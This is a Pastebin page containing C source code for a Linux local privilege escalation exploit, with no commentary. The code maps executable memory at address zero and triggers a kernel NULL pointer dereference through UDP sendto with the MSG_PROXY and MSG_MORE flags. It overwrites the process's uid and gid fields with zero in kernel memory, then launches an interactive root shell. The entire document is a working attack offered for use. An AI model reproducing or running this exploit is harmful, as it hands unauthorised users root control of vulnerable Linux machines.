Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <unistd.h>
- #include <string.h>
- #include <sys/socket.h>
- #include <sys/mman.h>
- #include <fcntl.h>
- #include <sys/personality.h>
- unsigned int uid, gid;
- void get_root_uid(unsigned *task)
- {
- unsigned *addr=task;
- while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
- addr++;
- }
- addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
- addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
- return;
- }
- void exploit();
- void kernel_code()
- {
- asm("exploit:\n"
- "push %eax\n"
- "movl $0xfffff000,%eax\n"
- "andl %esp,%eax\n"
- "pushl (%eax)\n"
- "call get_root_uid\n"
- "addl $4,%esp\n"
- "popl %eax\n");
- return;
- }
- void *kernel=kernel_code;
- int main(int argc, char **argv)
- {
- int fd=0;
- char buf[1024];
- struct sockaddr x0x;
- void *zero_page;
- uid=getuid();
- gid=getgid();
- if(uid==0){
- fprintf(stderr,"[-] check ur uid\n");
- return -1;
- }
- if(personality(0xffffffff)==PER_SVR4){
- if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
- perror("[-] mprotect()");
- return -1;
- }
- }
- else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
- perror("[-] mmap()");
- return -1;
- }
- *(unsigned long *)0x0=0x90909090;
- *(char *)0x00000004=0x90; /* +1 */
- *(char *)0x00000005=0xff;
- *(char *)0x00000006=0x25;
- *(unsigned long *)0x00000007=(unsigned long)&kernel;
- *(char *)0x0000000b=0xc3;
- if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
- perror("[-] socket()");
- return -1;
- }
- x0x.sa_family=AF_UNSPEC;
- memset(x0x.sa_data,0x82,14);
- memset((char *)buf,0,sizeof(buf));
- sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
- sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
- if(getuid()==uid){
- printf("[-] exploit failed, try again\n");
- return -1;
- }
- close(fd);
- execl("/bin/sh","sh","-i",NULL);
- return 0;
- }
Add Comment
Please, Sign In to add comment
